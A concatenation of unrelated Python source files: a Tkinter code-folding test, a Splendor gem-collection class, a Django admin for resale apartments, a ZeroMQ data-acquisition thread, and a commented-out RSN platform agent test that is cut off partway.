get_main_window().event_generate("<<Menubar:Edit/Fold>>")
[three_dots] = [text.nametowidget(name) for name in text.window_names()]
assert text.index("5.0 lineend") == "5.24"
text.update()
three_dots.event_generate("<Button-1>") # click it
assert text.index("5.0 lineend") == "5.23"
def test_doesnt_trigger_change_events(filetab):
filetab.textwidget.insert("1.0", 'if True:\n print("lol")')
events = []
filetab.textwidget.bind("<<ContentChanged>>", events.append, add=True)
# fold and unfold
filetab.textwidget.mark_set("insert", "1.0 lineend")
get_main_window().event_generate("<<Menubar:Edit/Fold>>")
filetab.textwidget.mark_set("insert", "1.0 lineend")
filetab.textwidget.event_generate("<BackSpace>")
assert filetab.textwidget.get("1.0", "end - 1 char") == 'if True:\n print("lol")'
# This should not trigger change events
assert not events
|
from typing import Dict, Set
from functools import reduce
from gym_splendor_code.envs.mechanics.enums import GemColor
class GemsCollection():
'''This class is used to desribed a collection of gemes. It can be treated both as a wallet of games or as a price
of a single card.'''
def __init__(self,
gems_values_dict: Dict[GemColor, int] = None) -> None:
"""Creates a collection of gems.
Parameters:
_ _ _ _ _ _
gems_values: Dictionary with the keys being gem color ans values being integers. Ig gems=None, than it creates a
collection with all values set to zero."""
if gems_values_dict is None:
self.gems_dict = {gem_color : 0 for gem_color in GemColor}
else:
self.gems_dict = gems_values_dict
def value(self, gem_color):
"""Returns value of gem_color form this gems collection."""
return self.gems_dict[gem_color]
def sum(self):
return sum(self.gems_dict.values())
def __add__(self, other):
"""Adds other gems colletion to this one.
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be added.
Returns:
_ _ _ _ _ _
An object of class GemsCollection with a dictionary of color values, which is a key-wise sum.
"""
return GemsCollection({gem_color : self.gems_dict[gem_color] + other.gems_dict[gem_color] for gem_color in GemColor})
def __sub__(self, other):
"""Subtracts other gems colletion from this one.
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be subtracted.
Returns:
_ _ _ _ _ _
An object of class GemsCollection with a dictionary of color values, which is a key-wise sum.
"""
return GemsCollection({gem_color : self.gems_dict[gem_color] - other.gems_dict[gem_color] for gem_color in GemColor})
def __le__(self, other):
"""Checks if this instance is smaller or equal to the other (gem-wise check).
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be compared.
Returns:
_ _ _ _ _ _
Boolean value, that is True if for each gem color the value of this on this color is <= than the value of other
on this color.
"""
return reduce(lambda x, y: x and y, [self.gems_dict[gem_color] <= other.gems_dict[gem_color] for gem_color in
GemColor])
def __ge__(self, other):
"""Checks if this instance is greater or equal to the other (gem-wise check).
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be compared.
Returns:
_ _ _ _ _ _
Boolean value, that is True if for each gem color the value of this on this color is >= than the value of other
on this color.
"""
return reduce(lambda x, y: x and y, [self.gems_dict[gem_color] >= other.gems_dict[gem_color] for gem_color in
GemColor])
def __mod__(self, other):
"""Subtracts other gems collection form self and then sets all negative values to zero.
Parameters:
_ _ _ _ _ _
other: An object of class GemsCollection to be subtracted and later made non-negative.
Returns:
_ _ _ _ _ _
Gems collection that is the result of this operation."""
return GemsCollection({gem_color : max(0, self.gems_dict[gem_color] - other.gems_dict[gem_color]) for
gem_color in GemColor})
def __neg__(self):
"""Returns gems collection with -values for each gem color."""
return GemsCollection({gem_color: -self.gems_dict[gem_color] for gem_color in GemColor})
def __eq__(self, other):
list_of_conditions = [self.value(gem_color) == other.value(gem_color) for gem_color in GemColor]
return reduce(lambda x, y: x and y, list_of_conditions)
def __repr__(self):
return self.gems_dict.__repr__().replace('GemColor.','')
def non_empty_stacks(self) -> Set[GemColor]:
return {gem_color for gem_color in GemColor if self.gems_dict[gem_color] > 0}
def non_empty_stacks_except_gold(self) -> Set[GemColor]:
return {gem_color for gem_color in GemColor if self.gems_dict[gem_color] > 0
and gem_color != GemColor.GOLD}
def __copy__(self):
return GemsCollection({gem_color : self.gems_dict[gem_color] for gem_color in GemColor})
def to_dict(self):
return [self.gems_dict[gem_color] for gem_color in GemColor]
def to_dict_neg(self):
return [ -self.gems_dict[gem_color] for gem_color in GemColor]
def get_colors_on_condition(self, cond):
return {gem_color for gem_color in GemColor if self.gems_dict[gem_color] >= cond
and gem_color != GemColor.GOLD}
def get_all_colors_on_condition(self, cond):
return {gem_color for gem_color in GemColor if self.gems_dict[gem_color] >= cond}
|
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from adminsortable2.admin import SortableInlineAdminMixin
from real_estate.admin import (
AdminInlineImages,
MultiuploadInlinesContainerMixin,
)
from .models import (
ResaleApartment,
ResaleApartmentImage,
ResaleCharacteristic,
ResaleDecoration,
)
from .forms import ResaleApartmentForm, ResaleApartmentImageForm
class ResaleImageInline(
SortableInlineAdminMixin, admin.TabularInline, AdminInlineImages):
model = ResaleApartmentImage
form = ResaleApartmentImageForm
classes = ['collapse', ]
extra = 0
min_num = 0
fields = ('thumbnail', 'image')
readonly_fields = ('thumbnail', )
@admin.register(ResaleApartment)
class ResaleApartmentAdmin(MultiuploadInlinesContainerMixin, admin.ModelAdmin):
inlines = [ResaleImageInline, ]
form = ResaleApartmentForm
list_display_initial = (
'id', 'status', 'is_active', 'rooms', 'total_area',
'full_price', 'agency_price', 'fee', 'price',
'residental_complex',
)
list_filter_initial = ('rooms', 'residental_complex', )
list_display = list_display_initial
list_filter = list_filter_initial
list_display_links = (
'id', 'status', 'rooms', 'total_area'
)
list_editable = ('is_active', )
readonly_fields = ['id', 'date_added', 'modified_by']
filter_horizontal = ['characteristics']
def fee(self, obj):
return obj.fee
fee.short_description = _('комиссия')
def full_price(self, obj):
return obj.full_price
full_price.short_description = _("текущая стоимость")
fieldsets = None
# For multiupload by MultiuploadInlinesContainerMixin
related_inline_form = ResaleApartmentImageForm
related_inline_fk = 'apartment'
def get_fieldsets(self, request, obj=None):
self.fieldsets = self.dynamic_fieldset(request)
return super().get_fieldsets(request, obj)
def dynamic_fieldset(self, request):
"""
get the dynamic field sets
"""
deal_status_part_fields = (
'date_added',
('sold_date', 'previous_buy_date',),
'status',
'amount_of_owners',
'comment',
'related_mortgage',
'price',
'agency_price',
'agency_price_with_sales',
)
if request.user.has_perm('resale.can_add_change_delete_all_resale'):
deal_status_part_fields += ('created_by', 'modified_by',)
deal_status_part = (_('Информация по сделке'), {
'classes': ('collapse',),
'fields': deal_status_part_fields,
})
owner_part = (_('Информация по продавцу'), {
'classes': ('collapse',),
'fields': (('owner_name', 'owner_phone_number'),),
})
apartment_part_fields = (
'neighbourhood',
'residental_complex',
'street',
(
'building',
'building_block',
),
'coordinates',
'rooms',
(
'floor',
'number_of_storeys',
),
'section',
'apartment_number',
'building_type',
'home_series',
'date_of_construction',
(
'total_area',
'kitchen_area',
'balcony_area',
),
(
'celling_height',
'decoration',
),
'layout',
'description',
'characteristics'
)
apartment_part = (_('Информация по квартире'), {
'classes': ('collapse',),
'fields': apartment_part_fields,
})
fieldsets = (
(None, {
'fields': ('id', 'is_active',),
}),
deal_status_part,
owner_part,
apartment_part,
)
return fieldsets
def save_model(self, request, obj, form, change):
super().save_model(request, obj, form, change)
# Auto set user
if not change:
obj.created_by = request.user
if 'modified_by' not in form.changed_data:
obj.modified_by = request.user
obj.save()
def get_queryset(self, request):
qs = super(ResaleApartmentAdmin, self).get_queryset(request)
if request.user.has_perm('resale.can_add_change_delete_all_resale'):
return qs
return qs.filter(created_by=request.user)
def changelist_view(self, request, extra_context=None):
self.list_display = self.list_display_initial
self.list_filter = self.list_filter_initial
if request.user.has_perm('resale.can_add_change_delete_all_resale'):
self.list_display += ('created_by',)
self.list_filter = ('created_by',) + self.list_filter
return super(ResaleApartmentAdmin, self).changelist_view(
request, extra_context)
admin.site.register(ResaleCharacteristic)
admin.site.register(ResaleDecoration)
|
import time
import threading
import zmq
import traceback
THREAD_DELAY_SEC = 0.05
SHOTS_BUFFER_SIZE = 100
'''
class DataEventCallBack(PyTango.utils.EventCallBack):
def __init__(self, parent_obj):
self.parent = parent_obj
return
def push_event(self, event_data):
try:
if not event_data.err:
player_name = "/".join(event_data.attr_name.split("/")[-4:-1])
ack_value = event_data.attr_value.value
ack_trg = event_data.attr_value.time.tv_sec
ack_attrname = event_data.attr_name.split("/")[-1]
if abs(ack_trg - self.parent.last_ack) > 10000:
# Fake trigger
return
self.parent.last_ack = ack_trg
self.parent.last_ack_time = time.time()
self.parent._data_buffer[ack_trg] = ack_value
if self.parent._data_buffer.has_key(ack_trg-SHOTS_BUFFER_SIZE):
del self.parent._data_buffer[ack_trg-SHOTS_BUFFER_SIZE]
#print "DAQ THREAD",player_name,ack_trg,ack_value
if (ack_trg == 0) and (self.parent.main_thread.max_triggers != 1):
# Postpone the first trigger, just to be sure that the sequence really started
return
elif (ack_trg == 1) and (self.parent.main_thread.max_triggers != 1):
# Notify main thread also the first data arrived (trg == 0)
self.parent.main_thread.notify_new_data(self.parent, 0)
# Notify main thread that new data arrived
self.parent.main_thread.notify_new_data(self.parent, ack_trg)
except Exception, e:
print e
'''
class DataAcqThread(threading.Thread):
#-----------------------------------------------------------------------------------
# __init__
#-----------------------------------------------------------------------------------
def __init__(self, parent_obj, zmq_pub_url, data_name, alias_name):
threading.Thread.__init__(self)
self._alive = True
self._started = False
self.main_thread = parent_obj
self.player_pub_url = zmq_pub_url
self.data_name = data_name.lower()
self.data_alias = alias_name
#
self.context = zmq.Context()
self.poller = zmq.Poller()
self.sub_sock = None
self._data_buffer = {}
self.last_ack = -1
self.last_ack_time = time.time()
self.myState = "STANDBY"
#
self.set_new_url(zmq_pub_url)
#-----------------------------------------------------------------------------------
# set_new_url
#-----------------------------------------------------------------------------------
def set_new_url(self, url):
try:
if self.sub_sock is not None:
self.poller.unregister(self.sub_sock)
self.sub_sock.close()
self.sub_sock = self.context.socket(zmq.SUB)
self.sub_sock.setsockopt(zmq.SUBSCRIBE, '')
self.sub_sock.connect("tcp://"+str(url))
self.poller.register(self.sub_sock, zmq.POLLIN)
except:
traceback.print_exc()
del self.sub_sock
self.sub_sock = None
#-----------------------------------------------------------------------------------
# run
#-----------------------------------------------------------------------------------
def run(self):
self.myState = "STANDBY"
while self._alive:
if self._started:
self.myState = "ON"
self.last_ack_time = time.time()
while (self._started):
socks = dict(self.poller.poll(1000))
if len(socks) > 0 and self.sub_sock in socks and socks[self.sub_sock] == zmq.POLLIN:
try:
reply = self.sub_sock.recv_pyobj()
if reply[0] == 'data' and (reply[1]).lower() == self.data_name:
self.main_thread.notify_new_data(self.data_alias,reply[2],reply[3],reply[4])
except:
traceback.print_exc()
if (time.time() - self.last_ack_time) > 20 :
self.myState = "OFF"
elif (self.myState != "ON") :
self.myState = "ON"
self.myState = "STANDBY"
time.sleep(THREAD_DELAY_SEC)
|
# #!/usr/bin/env python
#
# """
# @package ion.agents.platform.test.test_platform_agent_with_rsn
# @file ion/agents/platform/test/test_platform_agent_with_rsn.py
# @author Carlos Rueda
# @brief Test cases for platform agent interacting with RSN
# """
#
# __author__ = 'Carlos Rueda'
# __license__ = 'Apache 2.0'
#
# # The following can be prefixed with PLAT_NETWORK=single to exercise the tests
# # with a single platform (with no sub-platforms). Otherwise a small network is
# # used. See HelperTestMixin.
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_resource_monitoring
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_capabilities
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_some_state_transitions
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_get_set_resources
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_some_commands
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_resource_monitoring
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_resource_monitoring_recent
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_external_event_dispatch
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_connect_disconnect_instrument
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_check_sync
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_execute_resource
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_resource_states
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_lost_connection_and_reconnect
# # bin/nosetests -sv ion/agents/platform/test/test_platform_agent_with_rsn.py:TestPlatformAgent.test_alerts
# #
#
#
# from ion.agents.platform.test.base_test_platform_agent_with_rsn import BaseIntTestPlatform
# from pyon.public import log, CFG
#
# from pyon.util.containers import get_ion_ts
#
# from interface.objects import AgentCommand
# from interface.objects import CapabilityType
# from interface.objects import AgentCapability
#
# from interface.objects import StreamAlertType, AggregateStatusType
#
# from pyon.core.exception import Conflict
#
# from pyon.event.event import EventSubscriber
#
# from ion.agents.platform.platform_agent import PlatformAgentState
# from ion.agents.platform.platform_agent import PlatformAgentEvent
# from ion.agents.platform.responses import NormalResponse
# from ion.agents.platform.rsn.rsn_platform_driver import RSNPlatformDriverState
# from ion.agents.platform.rsn.rsn_platform_driver import RSNPlatformDriverEvent
#
# from ion.services.dm.utility.granule.record_dictionary import RecordDictionaryTool
# from pyon.public import IonObject
# from pyon.util.containers import current_time_millis
# from ion.agents.platform.util import ntp_2_ion_ts
#
# from gevent import sleep
# from gevent.event import AsyncResult
# from mock import patch
# from pyon.public import CFG
# import unittest
# import os
#
# @patch.dict(CFG, {'endpoint': {'receive': {'timeout': 180}}})
# @unittest.skipIf((not os.getenv('PYCC_MODE', False)) and os.getenv('CEI_LAUNCH_TEST', False), 'Skip until tests support launch port agent configurations.')
# class TestPlatformAgent(BaseIntTestPlatform):
#
# def _create_network_and_start_root_platform(self, clean_up=None):
# """
# Call this at the beginning of each test. We need to make sure that
# the patched timeout is in effect for the actions performed here.
#
# @note this used to be done in setUp, but the patch.dict mechanism does
# *not* take effect in setUp!
#
# An addCleanup function is added to reset/shutdown the network and stop the
# root platform. Should avoid leaked processes/greenlet upon failing tests
# (except perhaps if they happen during the launch of the root platform).
#
# @param clean_up Not None to override default pre-cleanUp calls.
# """
# self._set_receive_timeout()
#
# self.p_root = None
#
# # NOTE The tests expect to use values set up by HelperTestMixin for
# # the following networks (see ion/agents/platform/test/helper.py)
# if self.PLATFORM_ID == 'Node1D':
# #self.p_root = self._create_small_hierarchy()
# instr_keys = ["SBE37_SIM_01", ]
# self.p_root = self._set_up_small_hierarchy_with_some_instruments(instr_keys)
#
# elif self.PLATFORM_ID == 'LJ01D':
# self.p_root = self._create_single_platform()
#
# else:
# self.fail("self.PLATFORM_ID expected to be one of: 'Node1D', 'LJ01D'")
#
# self._start_platform(self.p_root)
#
# def done():
# if self.p_root:
# try:
# if clean_up:
# clean_up()
# else:
# # default "done" sequence for most tests
# try:
# self._go_inactive()
# self._reset()
# finally: # attempt shutdown anyway
# self._shutdown()
# finally:
# self._stop_platform(self.p_root)
# self.p_root = None
# self.addCleanup(done)
#
# def _connect_instrument(self):
# #
# # TODO more realistic settings for the connection
# #
# port_id = self.PORT_ID
# instrument_id = self.INSTRUMENT_ID
# instrument_attributes = self.INSTRUMENT_ATTRIBUTES_AND_VALUES
#
# kwargs = dict(
# port_id = port_id,
# instrument_id = instrument_id,
# attributes = instrument_attributes
# )
# result = self._execute_resource(RSNPlatformDriverEvent.CONNECT_INSTRUMENT, **kwargs)
# log.info("CONNECT_INSTRUMENT = %s", result)
# self.assertIsInstance(result, dict)
# self.assertIn(port_id, result)
# self.assertIsInstance(result[port_id], dict)
# returned_attrs = self._verify_valid_instrument_id(instrument_id, result[port_id])
# if isinstance(returned_attrs, dict):
# for attrName in instrument_attributes:
# self.assertIn(attrName, returned_attrs)
#
# def _disconnect_instrument(self):
# # TODO real settings and corresp verification
#
# port_id = self.PORT_ID
# instrument_id = self.INSTRUMENT_ID
#
# kwargs = dict(
# port_id = port_id,
# instrument_id = instrument_id
# )
# result = self._execute_resource(RSNPlatformDriverEvent.DISCONNECT_INSTRUMENT, **kwargs)
# log.info("DISCONNECT_INSTRUMENT = %s", result)
# self.assertIsInstance(result, dict)
# self.assertIn(port_id, result)
# self.assertIsInstance(result[port_id], dict)
# self.assertIn(instrument_id, result[port_id])
# self._verify_instrument_disconnected(instrument_id, result[port_id][instrument_id])
#
# def _turn_on_port(self):
# # TODO real settings and corresp verification
#
# port_id = self.PORT_ID
#
# kwargs = dict(
# port_id = port_id
# )
# result = self._execute_resource(RSNPlatformDriverEvent.TURN_ON_PORT, **kwargs)
# log.info("TURN_ON_PORT = %s", result)
# self.assertIsInstance(result, dict)
# self.assertTrue(port_id in result)
# self.assertEquals(result[port_id], NormalResponse.PORT_TURNED_ON)
#
# def _turn_off_port(self):
# # TODO real settings and corresp verification
#
# port_id = self.PORT_ID
#
# kwargs = dict(
# port_id = port_id
# )
# result = self._execute_resource(RSNPlatformDriverEvent.TURN_OFF_PORT, **kwargs)
# log.info("TURN_OFF_PORT = %s", result)
# self.assertIsInstance(result, dict)
# self.assertTrue(port_id in result)
# self.assertEquals(result[port_id], NormalResponse.PORT_TURNED_OFF)
#
# def _get_resource(self):
# """
# Gets platform attribute values/
# """
# attrNames = self.ATTR_NAMES
# #
# # OOIION-631: use get_ion_ts() as a basis for using system time, which is
# # a string.
# #
# cur_time = get_ion_ts()
# from_time = str(int(cur_time) - 50000) # a 50-sec time window
# attrs = [(attr_id, from_time) for attr_id in attrNames]
# kwargs = dict(attrs=attrs)
# cmd = AgentCommand(command=PlatformAgentEvent.GET_RESOURCE, kwargs=kwargs)
# retval = self._execute_agent(cmd)
# attr_values = retval.result
# self.assertIsInstance(attr_values, dict)
# for attr_name in attrNames:
# self._verify_valid_attribute_id(attr_name, attr_values)
#
# def _set_resource(self):
# attrNames = self.ATTR_NAMES
# writ_attrNames = self.WRITABLE_ATTR_NAMES
#
# # do valid settings:
#
# # TODO more realistic value depending on attribute's type
# attrs = [(attrName, self.VALID_ATTR_VALUE) for attrName in attrNames]
# log.info("%r: setting attributes=%s", self.PLATFORM_ID, attrs)
# kwargs = dict(attrs=attrs)
# cmd = AgentCommand(command=PlatformAgentEvent.SET_RESOURCE, kwargs=kwargs)
# retval = self._execute_agent(cmd)
# attr_values = retval.result
# self.assertIsInstance(attr_values, dict)
# for attrName in attrNames:
# if attrName in writ_attrNames:
# self._verify_valid_attribute_id(attrName, attr_values)
# else:
# self._verify_not_writable_attribute_id(attrName, attr_values)
#
# # try invalid settings:
#
# # set invalid values to writable attributes:
# attrs = [(attrName, self.INVALID_ATTR_VALUE) for attrName in writ_attrNames]
# log.info("%r: setting attributes=%s", self.PLATFORM_ID, attrs)
# kwargs = dict(attrs=attrs)
# cmd = AgentCommand(command=PlatformAgentEvent.SET_RESOURCE, kwargs=kwargs)
# retval = self._execute_agent(cmd)
# attr_values = retval.result
# self.assertIsInstance(attr_values, dict)
# for attrName in writ_attrNames:
# self._verify_attribute_value_out_of_range(attrName, attr_values)
#
# def _get_subplatform_ids(self):
# kwargs = dict(subplatform_ids=None)
# cmd = AgentCommand(command=PlatformAgentEvent.GET_RESOURCE, kwargs=kwargs)
# retval = self._execute_agent(cmd)
# subplatform_ids = retval.result
# self.assertIsInstance(subplatform_ids, (list, tuple))
# return subplatform_ids
#
# def test_capabilities(self):
# self._create_network_and_start_root_platform()
#
# agt_cmds_all = [
# PlatformAgentEvent.INITIALIZE,
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
# PlatformAgentEvent.GO_ACTIVE,
# PlatformAgentEvent.GO_INACTIVE,
# PlatformAgentEvent.RUN,
#
# PlatformAgentEvent.CLEAR,
# PlatformAgentEvent.PAUSE,
# PlatformAgentEvent.RESUME,
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE,
# #PlatformAgentEvent.SET_RESOURCE,
# #PlatformAgentEvent.EXECUTE_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
#
# PlatformAgentEvent.START_MONITORING,
# PlatformAgentEvent.STOP_MONITORING,
#
# PlatformAgentEvent.RUN_MISSION,
# PlatformAgentEvent.ABORT_MISSION,
# PlatformAgentEvent.KILL_MISSION,
# ]
#
# def sort_caps(caps_list):
# agt_cmds = []
# agt_pars = []
# res_cmds = []
# res_iface = []
# res_pars = []
#
# if len(caps_list)>0 and isinstance(caps_list[0], AgentCapability):
# agt_cmds = [x.name for x in caps_list if x.cap_type==CapabilityType.AGT_CMD]
# agt_pars = [x.name for x in caps_list if x.cap_type==CapabilityType.AGT_PAR]
# res_cmds = [x.name for x in caps_list if x.cap_type==CapabilityType.RES_CMD]
# res_iface = [x.name for x in caps_list if x.cap_type==CapabilityType.RES_IFACE]
# res_pars = [x.name for x in caps_list if x.cap_type==CapabilityType.RES_PAR]
#
# elif len(caps_list)>0 and isinstance(caps_list[0], dict):
# agt_cmds = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.AGT_CMD]
# agt_pars = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.AGT_PAR]
# res_cmds = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.RES_CMD]
# res_iface = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.RES_IFACE]
# res_pars = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.RES_PAR]
#
# state = self._pa_client.get_agent_state()
# log.debug("sort_caps: in agent state=%s\n"
# "agt_cmds => %s\n"
# "agt_pars => %s\n"
# "res_cmds => %s\n"
# "res_iface => %s\n"
# "res_pars => %s\n",
# state, agt_cmds, agt_pars, res_cmds, res_iface, res_pars)
#
# return agt_cmds, agt_pars, res_cmds, res_iface, res_pars
#
# def verify_schema(caps_list):
#
# dd_list = ['display_name','description']
# ddt_list = ['display_name','description','type']
# ddvt_list = ['display_name','description','visibility','type']
# ddak_list = ['display_name','description','args','kwargs']
# kkvt_res_list = ['display_name', 'description', 'visibility',
# 'type, monitor_cycle_seconds', 'precision',
# 'min_val', 'max_val', 'units', 'group']
# stream_list = ['tdb', 'tdbtdb']
#
# for x in caps_list:
# if isinstance(x,dict):
# x.pop('type_')
# x = IonObject('AgentCapability', **x)
#
# try:
# if x.cap_type == CapabilityType.AGT_CMD:
# if x['name'] == 'example':
# pass
# keys = x.schema.keys()
# for y in ddak_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.AGT_PAR:
# if x.name != 'example':
# keys = x.schema.keys()
# for y in ddvt_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.RES_CMD:
# keys = x.schema.keys()
# for y in ddak_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.RES_IFACE:
# pass
#
# elif x.cap_type == CapabilityType.RES_PAR:
# pass
# #keys = x.schema.keys()
# #for y in kkvt_res_list:
# # self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.AGT_STATES:
# for (k,v) in x.schema.iteritems():
# keys = v.keys()
# for y in dd_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.ALERT_DEFS:
# for (k,v) in x.schema.iteritems():
# keys = v.keys()
# for y in ddt_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.AGT_CMD_ARGS:
# pass
# """
# for (k,v) in x.schema.iteritems():
# keys = v.keys()
# for y in ddt_list:
# self.assertIn(y, keys)
# """
#
# elif x.cap_type == CapabilityType.AGT_STREAMS:
# pass
# #keys = x.schema.keys()
# #for y in stream_list:
# # self.assertIn(y, keys)
#
# except Exception:
# print '### ERROR verifying schema for'
# print x['name']
# raise
#
# agt_pars_all = [
# 'example',
# 'child_agg_status',
# 'alerts',
# 'aggstatus',
# 'rollup_status',
# ]
# res_pars_all = []
# res_cmds_all = [
# RSNPlatformDriverEvent.CONNECT_INSTRUMENT,
# RSNPlatformDriverEvent.DISCONNECT_INSTRUMENT,
# RSNPlatformDriverEvent.TURN_ON_PORT,
# RSNPlatformDriverEvent.TURN_OFF_PORT,
# # RSNPlatformDriverEvent.CHECK_SYNC #OOIION-1623 Remove until Check Sync requirements fully defined
# ]
#
# ##################################################################
# # UNINITIALIZED
# ##################################################################
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities for state UNINITIALIZED.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_uninitialized = [
# PlatformAgentEvent.INITIALIZE,
# PlatformAgentEvent.SHUTDOWN,
# ]
# self.assertItemsEqual(agt_cmds, agt_cmds_uninitialized)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# self.assertItemsEqual(res_pars, [])
#
# # Get exposed capabilities in all states.
# retval = self._pa_client.get_capabilities(current_state=False)
#
# # Validate all capabilities as read from state UNINITIALIZED.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# self.assertItemsEqual(agt_cmds, agt_cmds_all)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# verify_schema(retval)
#
# ##################################################################
# # INACTIVE
# ##################################################################
# self._initialize()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities for state INACTIVE.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_inactive = [
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
# PlatformAgentEvent.GO_ACTIVE,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_inactive)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# # Get exposed capabilities in all states.
# retval = self._pa_client.get_capabilities(False)
#
# # Validate all capabilities as read from state INACTIVE.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# self.assertItemsEqual(agt_cmds, agt_cmds_all)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# verify_schema(retval)
#
# print '############### resource params'
# for x in res_pars:
# print str(x)
#
# ##################################################################
# # IDLE
# ##################################################################
# self._go_active()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities for state IDLE.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_idle = [
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
# PlatformAgentEvent.GO_INACTIVE,
# PlatformAgentEvent.RUN,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_idle)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# # Get exposed capabilities in all states as read from IDLE.
# retval = self._pa_client.get_capabilities(False)
#
# # Validate all capabilities as read from state IDLE.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# self.assertItemsEqual(agt_cmds, agt_cmds_all)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# verify_schema(retval)
#
# ##################################################################
# # COMMAND
# ##################################################################
# self._run()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities of state COMMAND
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_command = [
# PlatformAgentEvent.GO_INACTIVE,
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
# PlatformAgentEvent.PAUSE,
# PlatformAgentEvent.CLEAR,
#
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE,
# #PlatformAgentEvent.SET_RESOURCE,
# #PlatformAgentEvent.EXECUTE_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
#
# PlatformAgentEvent.START_MONITORING,
#
# PlatformAgentEvent.RUN_MISSION,
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_command)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, res_cmds_all)
# #self.assertItemsEqual(res_pars, res_pars_all)
#
# verify_schema(retval)
#
# ##################################################################
# # STOPPED
# ##################################################################
# self._pause()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities of state STOPPED
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_stopped = [
# PlatformAgentEvent.RESUME,
# PlatformAgentEvent.CLEAR,
# PlatformAgentEvent.GO_INACTIVE,
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
